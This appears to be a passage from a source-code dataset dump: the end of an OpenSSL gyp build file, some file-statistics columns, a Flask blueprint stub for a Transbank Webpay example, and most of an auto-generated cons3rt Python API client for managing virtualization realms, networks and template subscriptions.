"1.0.1m/openssl-1.0.1m/crypto", # e.g. cryptlib.h
"1.0.1m/openssl-1.0.1m/crypto/asn1", # e.g. asn1_locl.h
"1.0.1m/openssl-1.0.1m/crypto/evp", # e.g. evp_locl.h
"1.0.1m/openssl-1.0.1m/crypto/modes",
"1.0.1m/openssl-1.0.1m" # e.g. e_os.h
],
"defines": [
# #defines shared across platforms copied from ms\nt.mak
"OPENSSL_NO_RC4",
"OPENSSL_NO_RC5",
"OPENSSL_NO_MD2",
"OPENSSL_NO_SSL2",
"OPENSSL_NO_SSL3",
"OPENSSL_NO_KRB5",
"OPENSSL_NO_HW",
"OPENSSL_NO_JPAKE",
"OPENSSL_NO_DYNAMIC_ENGINE"
],
"conditions": [
["OS=='win'", {
"defines": [
# from ms\nt.mak
"OPENSSL_THREADS",
"DSO_WIN32",
"OPENSSL_SYSNAME_WIN32",
"WIN32_LEAN_AND_MEAN",
"L_ENDIAN",
"_CRT_SECURE_NO_DEPRECATE",
"NO_WINDOWS_BRAINDEATH" # for cversion.c
],
"link_settings" : {
"libraries" : [
# external libs (from nt.mak)
"-lws2_32.lib",
"-lgdi32.lib",
"-ladvapi32.lib",
"-lcrypt32.lib",
"-luser32.lib"
]
}
}],
["OS=='mac'", {
"defines": [
"OPENSSL_NO_EC_NISTP_64_GCC_128",
"OPENSSL_NO_GMP",
"OPENSSL_NO_JPAKE",
"OPENSSL_NO_MD2",
"OPENSSL_NO_RC5",
"OPENSSL_NO_RFC3779",
"OPENSSL_NO_SCTP",
"OPENSSL_NO_SSL2",
"OPENSSL_NO_SSL3",
"OPENSSL_NO_STORE",
"OPENSSL_NO_UNIT_TEST",
"NO_WINDOWS_BRAINDEATH"
]
}],
["OS=='iOS'", {
"defines": [
"OPENSSL_NO_EC_NISTP_64_GCC_128",
"OPENSSL_NO_GMP",
"OPENSSL_NO_JPAKE",
"OPENSSL_NO_MD2",
"OPENSSL_NO_RC5",
"OPENSSL_NO_RFC3779",
"OPENSSL_NO_SCTP",
"OPENSSL_NO_SSL2",
"OPENSSL_NO_SSL3",
"OPENSSL_NO_STORE",
"OPENSSL_NO_UNIT_TEST",
"NO_WINDOWS_BRAINDEATH"
]
}],
["OS=='linux'", {
"defines": [
# from Linux Makefile after ./configure
"DSO_DLFCN",
"HAVE_DLFCN_H",
"L_ENDIAN", # TODO: revisit!
"TERMIO",
# otherwise with clang 3.5 on Ubuntu it get errors around
# ROTATE() macro's inline asm. Error I had not got on
# Centos with clang 3.4.
# Note that this is only a problem with cflags -no-integrated-as
# which was necessary for clang 3.4. Messy. TODO: revisit
"OPENSSL_NO_INLINE_ASM",
"NO_WINDOWS_BRAINDEATH" # for cversion.c, otherwise error (where is buildinf.h?)
],
"link_settings" : {
"libraries" : [ "-ldl" ]
}
}]
]
},
{
"target_name": "ssltest",
"type": "executable",
"test": {
"cwd": "1.0.1m/openssl-1.0.1m/test"
},
"defines": [
# without these we get linker errors since the test assumes
# by default that SSL2 & 3 was built
"OPENSSL_NO_RC4",
"OPENSSL_NO_RC5",
"OPENSSL_NO_MD2",
"OPENSSL_NO_SSL2",
"OPENSSL_NO_SSL3",
"OPENSSL_NO_KRB5",
"OPENSSL_NO_HW",
"OPENSSL_NO_JPAKE",
"OPENSSL_NO_DYNAMIC_ENGINE"
],
"include_dirs": [
"1.0.1m/openssl-1.0.1m" # e.g. e_os.h
],
"sources": [
# note how the ssl test depends on many #defines set via
# ./configure. Do these need to be passed to the test build
# explicitly? Apparently not.
"1.0.1m/openssl-1.0.1m/ssl/ssltest.c"
],
"dependencies": [ "openssl" ],
# this disables building the example on iOS
"conditions": [
["OS=='iOS'",
{
"type": "none"
}
]
]
}
# compile one of the (interactive) openssl demo apps to verify correct
# compiler & linker settings in upstream gyp target:
# P.S.: I dont think this test can compile on Windows, so this is not
# suitable as a cross-platform test.
#{
# "target_name": "demos-easy_tls",
# "type": "executable",
# not suitable as a test, just building this to see if it links
#"test": {
# "cwd": "1.0.1m/openssl-1.0.1m/demos/easy_tls"
#},
# "include_dir": [ "1.0.1m/openssl-1.0.1m/demos/easy_tls" ],
# "sources": [
# "1.0.1m/openssl-1.0.1m/demos/easy_tls/test.c",
# "1.0.1m/openssl-1.0.1m/demos/easy_tls/easy-tls.c"
# ],
# "dependencies": [ "openssl" ]
#}
]
}
| 57.504182
| 104
| 0.506368
| 8,375
| 48,131
| 2.823522
| 0.07797
| 0.111811
| 0.223622
| 0.307946
| 0.861082
| 0.859855
| 0.85588
| 0.854612
| 0.851609
| 0.840825
| 0
| 0.140884
| 0.303484
| 48,131
| 836
| 105
| 57.572967
| 0.564491
| 0.048534
| 0
| 0.101673
| 0
| 0.785071
| 0.637511
| 0.61525
| 0
| 0
| 0
| 0.001196
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.007722
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
528f223260b6da1582db3fdbc1f5debd5a28d9dd
| 111
|
py
|
Python
|
webpay_plus_mall/__init__.py
|
TransbankDevelopers/transbank-sdk-python-webpay-rest-example
|
81bdd421e3efe1285122b82ad0634cec8f499dff
|
[
"BSD-3-Clause"
] | 4
|
2021-03-23T19:51:02.000Z
|
2022-02-07T20:05:27.000Z
|
webpay_plus_mall/__init__.py
|
TransbankDevelopers/transbank-sdk-python-webpay-rest-example
|
81bdd421e3efe1285122b82ad0634cec8f499dff
|
[
"BSD-3-Clause"
] | 2
|
2019-07-30T18:35:23.000Z
|
2019-07-30T18:35:43.000Z
|
webpay_plus_mall/__init__.py
|
TransbankDevelopers/transbank-sdk-python-webpay-rest-example
|
81bdd421e3efe1285122b82ad0634cec8f499dff
|
[
"BSD-3-Clause"
] | 1
|
2021-01-25T17:58:34.000Z
|
2021-01-25T17:58:34.000Z
|
from flask import Blueprint
bp = Blueprint('webpay_plus_mall', __name__)
from webpay_plus_mall import routes
| 18.5
| 44
| 0.81982
| 16
| 111
| 5.1875
| 0.625
| 0.240964
| 0.337349
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126126
| 111
| 5
| 45
| 22.2
| 0.85567
| 0
| 0
| 0
| 0
| 0
| 0.144144
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
bfed5d4d75aef4a4a7c58acf3a6d8954029b25e8
| 231,105
|
py
|
Python
|
cons3rt/api/virtualization_realms_api.py
|
cons3rt/cons3rt-python-sdk
|
f0bcb295735ac55bbe47448fcbd95d2c7beb3ec0
|
[
"RSA-MD"
] | null | null | null |
cons3rt/api/virtualization_realms_api.py
|
cons3rt/cons3rt-python-sdk
|
f0bcb295735ac55bbe47448fcbd95d2c7beb3ec0
|
[
"RSA-MD"
] | null | null | null |
cons3rt/api/virtualization_realms_api.py
|
cons3rt/cons3rt-python-sdk
|
f0bcb295735ac55bbe47448fcbd95d2c7beb3ec0
|
[
"RSA-MD"
] | null | null | null |
# coding: utf-8
from __future__ import absolute_import
"""
Copyright 2020 Jackpine Technologies Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
"""
cons3rt - Copyright Jackpine Technologies Corp.
NOTE: This file is auto-generated. Do not edit the file manually.
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from cons3rt.api_client import ApiClient
from cons3rt.exceptions import (
ApiTypeError,
ApiValueError
)
__author__ = 'Jackpine Technologies Corporation'
__copyright__ = 'Copyright 2020, Jackpine Technologies Corporation'
__license__ = 'Apache 2.0',
__version__ = '1.0.0'
__maintainer__ = 'API Support'
__email__ = 'support@cons3rt.com'
class VirtualizationRealmsApi(object):
"""NOTE: This class is auto-generated. Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def add_network(self, id, abstract_add_network_cloud_space_request, **kwargs): # noqa: E501
"""Allocate Network # noqa: E501
Adds a Network to the specified Virtualization Realm.<br> <br> Since this call results in the construction of a new, back-end Network it has financial implications and should not be used if the user is not prepared to incur the expense of construction and existence of the newly created Network. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_network(id, abstract_add_network_cloud_space_request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param AbstractAddNetworkCloudSpaceRequest abstract_add_network_cloud_space_request: The network allocation information (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: MinimalVirtualizationRealm
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.add_network_with_http_info(id, abstract_add_network_cloud_space_request, **kwargs) # noqa: E501
def add_network_with_http_info(self, id, abstract_add_network_cloud_space_request, **kwargs): # noqa: E501
"""Allocate Network # noqa: E501
Adds a Network to the specified Virtualization Realm.<br> <br> Since this call results in the construction of a new, back-end Network it has financial implications and should not be used if the user is not prepared to incur the expense of construction and existence of the newly created Network. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_network_with_http_info(id, abstract_add_network_cloud_space_request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param AbstractAddNetworkCloudSpaceRequest abstract_add_network_cloud_space_request: The network allocation information (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(MinimalVirtualizationRealm, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'abstract_add_network_cloud_space_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method add_network" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `add_network`") # noqa: E501
# verify the required parameter 'abstract_add_network_cloud_space_request' is set
if self.api_client.client_side_validation and ('abstract_add_network_cloud_space_request' not in local_var_params or # noqa: E501
local_var_params['abstract_add_network_cloud_space_request'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `abstract_add_network_cloud_space_request` when calling `add_network`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'abstract_add_network_cloud_space_request' in local_var_params:
body_params = local_var_params['abstract_add_network_cloud_space_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/networks', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MinimalVirtualizationRealm', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def add_project(self, id, project_id, **kwargs): # noqa: E501
"""Assign Project # noqa: E501
Provides members of the Project with access to the specified Virtualization Realm # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_project(id, project_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param str project_id: ID of project to assign (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: int
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.add_project_with_http_info(id, project_id, **kwargs) # noqa: E501
def add_project_with_http_info(self, id, project_id, **kwargs): # noqa: E501
"""Assign Project # noqa: E501
Provides members of the Project with access to the specified Virtualization Realm # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_project_with_http_info(id, project_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param str project_id: ID of project to assign (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(int, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'project_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method add_project" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `add_project`") # noqa: E501
# verify the required parameter 'project_id' is set
if self.api_client.client_side_validation and ('project_id' not in local_var_params or # noqa: E501
local_var_params['project_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `project_id` when calling `add_project`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'project_id' in local_var_params and local_var_params['project_id'] is not None: # noqa: E501
query_params.append(('projectId', local_var_params['project_id'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/projects', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='int', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def create_template_subsciption(self, id, registration_id, **kwargs): # noqa: E501
"""Create Template Subscription # noqa: E501
Creates a Template Subscription in the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_template_subsciption(id, registration_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param int registration_id: ID of template registration (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: FullTemplateSubscription
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_template_subsciption_with_http_info(id, registration_id, **kwargs) # noqa: E501
def create_template_subsciption_with_http_info(self, id, registration_id, **kwargs): # noqa: E501
"""Create Template Subscription # noqa: E501
Creates a Template Subscription in the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_template_subsciption_with_http_info(id, registration_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param int registration_id: ID of template registration (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(FullTemplateSubscription, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'registration_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_template_subsciption" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `create_template_subsciption`") # noqa: E501
# verify the required parameter 'registration_id' is set
if self.api_client.client_side_validation and ('registration_id' not in local_var_params or # noqa: E501
local_var_params['registration_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `registration_id` when calling `create_template_subsciption`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'registration_id' in local_var_params and local_var_params['registration_id'] is not None: # noqa: E501
query_params.append(('registration_id', local_var_params['registration_id'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/templates/subscriptions', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FullTemplateSubscription', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_network(self, id, network_id, **kwargs): # noqa: E501
"""Delete Network # noqa: E501
Removes an existing Network from the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_network(id, network_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param int network_id: ID of network (required)
:param bool deallocate: Attempt to delete all back-end resources
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_network_with_http_info(id, network_id, **kwargs) # noqa: E501
def delete_network_with_http_info(self, id, network_id, **kwargs): # noqa: E501
"""Delete Network # noqa: E501
Removes an existing Network from the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_network_with_http_info(id, network_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param int network_id: ID of network (required)
:param bool deallocate: Attempt to delete all back-end resources
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'network_id', 'deallocate'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_network" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `delete_network`") # noqa: E501
# verify the required parameter 'network_id' is set
if self.api_client.client_side_validation and ('network_id' not in local_var_params or # noqa: E501
local_var_params['network_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `network_id` when calling `delete_network`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'network_id' in local_var_params:
path_params['networkId'] = local_var_params['network_id'] # noqa: E501
query_params = []
if 'deallocate' in local_var_params and local_var_params['deallocate'] is not None: # noqa: E501
query_params.append(('deallocate', local_var_params['deallocate'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/networks/{networkId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_template_subscription(self, id, subscription_id, **kwargs): # noqa: E501
"""Delete Template Subscription # noqa: E501
Removes an existing Template Subscription from the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_template_subscription(id, subscription_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param int subscription_id: ID of template subscription (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_template_subscription_with_http_info(id, subscription_id, **kwargs) # noqa: E501
def delete_template_subscription_with_http_info(self, id, subscription_id, **kwargs): # noqa: E501
"""Delete Template Subscription # noqa: E501
Removes an existing Template Subscription from the specified Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_template_subscription_with_http_info(id, subscription_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param int subscription_id: ID of template subscription (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'subscription_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_template_subscription" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `delete_template_subscription`") # noqa: E501
# verify the required parameter 'subscription_id' is set
if self.api_client.client_side_validation and ('subscription_id' not in local_var_params or # noqa: E501
local_var_params['subscription_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `subscription_id` when calling `delete_template_subscription`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'subscription_id' in local_var_params:
path_params['subscription_id'] = local_var_params['subscription_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/templates/subscriptions/{subscription_id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def disable_virt_realm_remote_access(self, id, **kwargs): # noqa: E501
"""Disable Remote Access # noqa: E501
Disables Remote Access for a single Virtualization Realm by the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.disable_virt_realm_remote_access(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.disable_virt_realm_remote_access_with_http_info(id, **kwargs) # noqa: E501
def disable_virt_realm_remote_access_with_http_info(self, id, **kwargs): # noqa: E501
"""Disable Remote Access # noqa: E501
Disables Remote Access for a single Virtualization Realm by the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.disable_virt_realm_remote_access_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of virtualization realm (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method disable_virt_realm_remote_access" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `disable_virt_realm_remote_access`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/remoteaccess', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def enable_maintence_mode1(self, id, **kwargs): # noqa: E501
"""Update Maintenance Mode # noqa: E501
Updates the maintenance status for a single Virtualization Realm by the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
